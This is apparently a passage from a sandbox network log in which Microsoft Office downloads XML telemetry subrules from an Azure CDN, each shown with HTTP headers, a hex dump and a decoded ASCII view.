                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        89192.168.2.74981513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:46 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:46 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 432
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                        x-ms-request-id: 0312aba8-e01e-0085-12cc-45c311000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125346Z-1746fd949bdnq7x2hC1EWRpxr000000001200000000079kp
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:46 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        90192.168.2.74981613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:46 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:46 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 475
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                        x-ms-request-id: 4879dc54-201e-0096-5ac3-45ace6000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125346Z-1746fd949bdnq7x2hC1EWRpxr00000000100000000009e2n
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:46 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        91192.168.2.74981713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:47 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:47 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                        x-ms-request-id: 1e2c2913-401e-0078-28cc-454d34000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125347Z-1746fd949bd54zxghC1EWRzre400000001cg00000000bs44
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:47 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        92192.168.2.74981813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:47 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:47 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                        x-ms-request-id: 85a1d3f6-901e-005b-3ecd-452005000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125347Z-1746fd949bddtfvqhC1EWRxbpg000000018g0000000017br
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:47 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        93192.168.2.74982013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:47 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:48 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                        x-ms-request-id: 859f66ca-901e-005b-0ccc-452005000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125348Z-1746fd949bdmv56chC1EWRypnn00000001ag000000008xq7
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:48 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        94192.168.2.74982213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:48 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:49 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 405
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                        x-ms-request-id: 92011275-e01e-0033-54c3-454695000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125349Z-1746fd949bdjzh7thC1EWR3g64000000016g0000000092m0
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:49 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        95192.168.2.74982113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:48 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:49 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                        x-ms-request-id: 72953a3b-301e-0000-41cd-45eecc000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125349Z-1746fd949bdxk6n6hC1EWRdr8c0000000110000000008hy0
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:49 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        96192.168.2.74982313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:49 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:49 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                        x-ms-request-id: 626f2b07-401e-0015-15d1-450e8d000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125349Z-1746fd949bdfg4slhC1EWR34t00000000120000000008exq
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:49 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        97192.168.2.74982413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:49 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:49 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 174
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                        x-ms-request-id: e8edc24c-801e-0083-0ecc-45f0ae000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125349Z-1746fd949bdb8xvchC1EWRmbd4000000013g00000000a4sz
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:49 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        98192.168.2.74982513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:50 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:50 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1952
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                        x-ms-request-id: 3e1c70e6-d01e-0028-76c3-457896000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125350Z-1746fd949bd7wvgbhC1EWR0rgs00000001cg000000000mxr
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
